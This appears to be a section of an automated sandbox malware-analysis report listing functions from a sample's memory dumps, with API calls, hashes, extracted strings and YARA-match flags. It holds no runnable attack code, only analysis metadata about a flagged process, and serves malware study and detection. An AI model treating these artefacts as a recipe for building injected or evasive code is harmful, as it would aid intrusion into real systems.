                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 2786a4359fcfa1591033ed6b903532bcf9fc48000524053acc62e0645bbcb786
                                                                • Instruction ID: 29381ea9cff283bbb972268ea06c775645f7a33552fdf8f5896fbfd5c33012be
                                                                • Opcode Fuzzy Hash: 2786a4359fcfa1591033ed6b903532bcf9fc48000524053acc62e0645bbcb786
                                                                • Instruction Fuzzy Hash: C690023260580802F150715944147560005CBD0305F55D051A0025755D8759DB5676A1
                                                                Function 04BD2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 6e1d792dc701db71c5ec7e5a2e73a756269cb2dffa58e9f990ea8af5baae7cb8
                                                                • Instruction ID: bf2833956bff9d013a3cee391551769fbcc8c516693fc321fa74e51c83c072ce
                                                                • Opcode Fuzzy Hash: 6e1d792dc701db71c5ec7e5a2e73a756269cb2dffa58e9f990ea8af5baae7cb8
                                                                • Instruction Fuzzy Hash: 6B90023220180802F1807159440465A0005CBD1305F95D055A0026755DCB19DB5A77A1
                                                                Function 04BD2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e4e9bdd4bca878fff6bf3342a52a370c92c47b2e2ce25cd68d74748d81044c8f
                                                                • Instruction ID: 170cb2e7530c5551192da86db247e2b0f2d258f55fed4a628ed139aec81cbf62
                                                                • Opcode Fuzzy Hash: e4e9bdd4bca878fff6bf3342a52a370c92c47b2e2ce25cd68d74748d81044c8f
                                                                • Instruction Fuzzy Hash: 1090023220584842F14071594404A560015CBD0309F55D051A0065795D9729DE56B661
                                                                Function 04BD2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c73e8e919663680ebbe11a61ce9aa05d202aec87f17b8ad1d11a96fa42452e49
                                                                • Instruction ID: 16ef8481e581543ef4db02415191411f2fc8254ee9c03b2254c2171b048063d7
                                                                • Opcode Fuzzy Hash: c73e8e919663680ebbe11a61ce9aa05d202aec87f17b8ad1d11a96fa42452e49
                                                                • Instruction Fuzzy Hash: 9E90026220280003610571594414626400ACBE0205B55D061E1015691DC629D9927125
                                                                Function 00C735C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 00C7369B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: 1aaae69779cbe995d272f68934818db50d460a4742592db42e8b2b3487748b3b
                                                                • Instruction ID: c1b8bec2dfa89c4aeafdf667d1127889921021fb1ebbe07b67d2191a57c09058
                                                                • Opcode Fuzzy Hash: 1aaae69779cbe995d272f68934818db50d460a4742592db42e8b2b3487748b3b
                                                                • Instruction Fuzzy Hash: 473181B1600605BBD714DFA4C881FEBBBB8FB84710F50851CF92D6B241D7706B409BA1
                                                                Function 00C6F069 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: ec414c05eec34560b85e2bf33e2dfe76d394d5280e7213c309e63593870ee418
                                                                • Instruction ID: 329e096bbbe5c543af032c76d158c48ccbcc3bd86a9d3cf0df05d1819a7ff0bb
                                                                • Opcode Fuzzy Hash: ec414c05eec34560b85e2bf33e2dfe76d394d5280e7213c309e63593870ee418
                                                                • Instruction Fuzzy Hash: 7B314FB6A0060A9FDB10DFD8D8809EFB3B9BF88304B108559E515EB204D775EE458BA0
                                                                Function 00C6F070 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: 51475e9a8e750ca56357523050f9ff64d961e237c889ec6b8ff81851dbde535c
                                                                • Instruction ID: f3f0ae5558e949d37b8b2c97e757d97b8b0c326f7dd3b0aa2d82610d56e31c55
                                                                • Opcode Fuzzy Hash: 51475e9a8e750ca56357523050f9ff64d961e237c889ec6b8ff81851dbde535c
                                                                • Instruction Fuzzy Hash: CD314FB5A0060A9FDB10DFD8DC809EFB3B9BF88304B108569E515AB205D771EE458BA0
                                                                Function 00C599FA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00C59A42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID: W
                                                                • API String ID: 2422867632-655174618
                                                                • Opcode ID: 8ff1ece351c3ce20fb1beaf30bdd1180325ea9a3264909c3501f73b245d836f5
                                                                • Instruction ID: 3145e96c72393828d50a8cf5f6f3b584ad6b394d077cf45ee1db384e7d9cb266
                                                                • Opcode Fuzzy Hash: 8ff1ece351c3ce20fb1beaf30bdd1180325ea9a3264909c3501f73b245d836f5
                                                                • Instruction Fuzzy Hash: EBF09B773C065476E32075A88C03FDB63989F44711F180415FB1CAB1C1D5A5B5821795
                                                                Function 00C79240 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00C61699,?,@,00C61699,00C7519E,@,?,00C61699,00C7519E,00001000,?,?,00000000), ref: 00C7927C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID: @
                                                                • API String ID: 1279760036-1127181893
                                                                • Opcode ID: 7fe3a8c3556c84ae845fe426c7cde924dbfabda77256b0d23c8b72b37fdbb06f
                                                                • Instruction ID: 4e724b0abc1fe9ac00391e9c02dd1ae67e8d8972ca1dfb55adc92a02a25e3ce5
                                                                • Opcode Fuzzy Hash: 7fe3a8c3556c84ae845fe426c7cde924dbfabda77256b0d23c8b72b37fdbb06f
                                                                • Instruction Fuzzy Hash: 8AE06D712002087BD610EE98DC45FAF37ACEFC9710F008009F908A7241D631B81087B9
                                                                Function 00C64190 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00C64202
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: fe612aa3d1b5742517d37b12b3a612cca01b15546c8e7c8025a9886ca340d8ad
                                                                • Instruction ID: d00f1446c8f35cdd3bfab9c59b3892f1ba77c524703fc56c22654c69cb94d6b2
                                                                • Opcode Fuzzy Hash: fe612aa3d1b5742517d37b12b3a612cca01b15546c8e7c8025a9886ca340d8ad
                                                                • Instruction Fuzzy Hash: A7011EB5E0020DABDF14EAE4DC82F9DB7B89B54708F008195E91C97241F631EB549B91
                                                                Function 00C79320 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00C67F4E,00000010,?,?,?,00000044,?,00000010,00C67F4E,?,?,?), ref: 00C79380
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateInternalProcess
                                                                • String ID:
                                                                • API String ID: 2186235152-0
                                                                • Opcode ID: 636b85313c04b41502c9f95272d90aac27abd10d0702741c2a568a481b734b23
                                                                • Instruction ID: 0cb30b293abe91b6c600ef018c65dae9ed9bcce84241c311da2e2fd0102f6529
                                                                • Opcode Fuzzy Hash: 636b85313c04b41502c9f95272d90aac27abd10d0702741c2a568a481b734b23
                                                                • Instruction Fuzzy Hash: 700180B6204108BBDB44DE99DC81EEB77ADEF8C754F458208BA09E3241D630F8518BA8
                                                                Function 00C59A00 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00C59A42
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: 9e9f9441e8a4535b7fd6c698f097ea96b60bc9520e5917387e25eec001cd25d0
                                                                • Instruction ID: b4354e453988e697a1ad2c2fc5a047dcd0cf3ba8d87574b4136b409a4ac49a18
                                                                • Opcode Fuzzy Hash: 9e9f9441e8a4535b7fd6c698f097ea96b60bc9520e5917387e25eec001cd25d0
                                                                • Instruction Fuzzy Hash: 6CF0653738061436E22075E99C02FD7769CDB84771F180065FB0CDB1C0D996B44152E5
                                                                Function 00C79290 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4B4A49C8,00000007,00000000,00000004,00000000,00C63A03,000000F4), ref: 00C792CC
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: c62be6cc92a3e58431fb62bc7859419cb4743e4f498431d4bdbd2b832dc52020
                                                                • Instruction ID: 45bd20ab62b6a855f27f8085028ab7cf6a4d4b66ee0b0aca38742d48327a6f32
                                                                • Opcode Fuzzy Hash: c62be6cc92a3e58431fb62bc7859419cb4743e4f498431d4bdbd2b832dc52020
                                                                • Instruction Fuzzy Hash: 4FE06D75604308BBDA10EE58DC41FAB33ADEFC4710F008408F908A7241C670B8118BF4
                                                                Function 00C67F90 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 00C67FB9
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 5d33eb37139503fae119cd8b54941262d24ef44f741ec2ef06360218b2b82389
                                                                • Instruction ID: adc40c720b0e380ab8eca229b1bbb42c47f3a5fb9d41be9a39e8856bc43dd570
                                                                • Opcode Fuzzy Hash: 5d33eb37139503fae119cd8b54941262d24ef44f741ec2ef06360218b2b82389
                                                                • Instruction Fuzzy Hash: 5AE0263524030467EB24A5F8DCC2F2333488B48768F084F50F83CCB2C1D678FA024251
                                                                Function 00C67D77 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00C61990,00C77ADF,00C7519E,00C61956), ref: 00C67DB0
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: fd26a4e3e3881d62e632e0248221a05b23eee4e09ee536ea7178faa923a8920d
                                                                • Instruction ID: 368cbdd5593d256d2ae2330e6aff11dc69928edb7a45d7f6f10c2045360da35a
                                                                • Opcode Fuzzy Hash: fd26a4e3e3881d62e632e0248221a05b23eee4e09ee536ea7178faa923a8920d
                                                                • Instruction Fuzzy Hash: F9E08CB27942026BF714FAB4EC42F212399AB14755F184824F908D7281EAA5A5508728
                                                                Function 00C60A5B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostThreadMessageW.USER32(?,00000111), ref: 00C60A67
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                • Instruction ID: 68bb10115b8bce0569d77a51a50f8915b71ded2cc8d25f3f07d44ec0d6e0f653
                                                                • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                • Instruction Fuzzy Hash: 7FD0A76770010C39AA1145D46CC1DFFB71CDB846A6F004063FB08E1040D5218D0206B0
                                                                Function 00C67D80 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00C61990,00C77ADF,00C7519E,00C61956), ref: 00C67DB0
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: e4bdde0dbc89c6e6e1787f0884092666664ef0c758f7199df5ec285d151b862f
                                                                • Instruction ID: 202b33b35cbd148a4e26183712041256e9f6878fca05e365a511bbedf8621d43
                                                                • Opcode Fuzzy Hash: e4bdde0dbc89c6e6e1787f0884092666664ef0c758f7199df5ec285d151b862f
                                                                • Instruction Fuzzy Hash: 2AD05E727943053BF714E6E4DC03F26328C9B00B55F088464BD18D72C2DDA5F5405679
                                                                Function 04BD2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 96ca0a715875c983adf7b3b7ba83d4614da6bb79349dbfa050ecb5fc2cd0414a
                                                                • Instruction ID: 2a677419ddc8b52210f05f62f785dcee1e4ccfc2f2ce27213d7538903df515f8
                                                                • Opcode Fuzzy Hash: 96ca0a715875c983adf7b3b7ba83d4614da6bb79349dbfa050ecb5fc2cd0414a
                                                                • Instruction Fuzzy Hash: 3FB09B729019C5C5FB15F76046087177900EBD0705F19C0E1D2030742E473CD5D1F275

                                                                Non-executed Functions

                                                                Function 04A604DE Relevance: .2, Instructions: 150COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133348638.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4a60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ca1e84ee6b4f8d87c725cf019f5e0126c6176da06ee532a7d8ae67e39261f36f
                                                                • Instruction ID: 74ff4d38074860619b7db5fa6782a4362855bb7de3f849639729097769176138
                                                                • Opcode Fuzzy Hash: ca1e84ee6b4f8d87c725cf019f5e0126c6176da06ee532a7d8ae67e39261f36f
                                                                • Instruction Fuzzy Hash: BB41A37561CB4D4FD368EF699081676B3E2FB89304F50492DD98BC3252EA70F8468785
                                                                Function 00C5DE30 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f52d45f995faf152995063f51a20150de1689d5a4e8f24d476871b50d9bf54da
                                                                • Instruction ID: a375f9cc16bc18eaebdf34dc186560b78abf4cdfc70e4396f0c1021e3aedd81d
                                                                • Opcode Fuzzy Hash: f52d45f995faf152995063f51a20150de1689d5a4e8f24d476871b50d9bf54da
                                                                • Instruction Fuzzy Hash: 35C01232AA011406D2344D6DBC015F6F3B4D347135F01136BEC59E72C09246C82141C8
                                                                Function 04A6DF4A Relevance: 56.5, Strings: 45, Instructions: 212COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133348638.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4a60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                • Opcode ID: 22a7c8b0da55f4a65a7585aac32c6abdeec44cec52396e664b905a40dc1b52cf
                                                                • Instruction ID: 31b90e99c17590f32659fc3b00e06994c30997b39c7db69f3cdfbc405f9744db
                                                                • Opcode Fuzzy Hash: 22a7c8b0da55f4a65a7585aac32c6abdeec44cec52396e664b905a40dc1b52cf
                                                                • Instruction Fuzzy Hash: 4E914EF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058F85
                                                                Function 04BD2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
                                                                • Instruction ID: 636d964d1d49422f2b745b17b102a95622faf81f9a19f53d5bbffc03fca3a9af
                                                                • Opcode Fuzzy Hash: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
                                                                • Instruction Fuzzy Hash: F451F4B6A04256BFDB24DFA8C88097EF7B8FF5820471081F9E455D3645E275FE508BA0
                                                                Function 04BC7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C04742
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C04725
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C04787
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C04655
                                                                • ExecuteOptions, xrefs: 04C046A0
                                                                • Execute=1, xrefs: 04C04713
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C046FC
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
                                                                • Instruction ID: a00962b534e47bf14bdf1a2f9337bc7ec2f7b58ef91a66ce4d47c0963416acd6
                                                                • Opcode Fuzzy Hash: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
                                                                • Instruction Fuzzy Hash: 3E51D63164021A6BEB14ABA8DC89BAA77A9EB05304F1400EDE505A7290EB70BE459F64
                                                                Function 04BDB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                • Instruction ID: 8ea8b20c90f8ad04a871fb56670030744011d0849de77c8b79dc5c6628c62395
                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                • Instruction Fuzzy Hash: 2B819070E092499FDF288E68C8917FEBBA1EF45350F1A45E9D861A7290F735B840CB54
                                                                Function 04A63C21 Relevance: 8.8, Strings: 7, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133348638.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4a60000_control.jbxd
                                                                Similarity
                                                                • API ID:
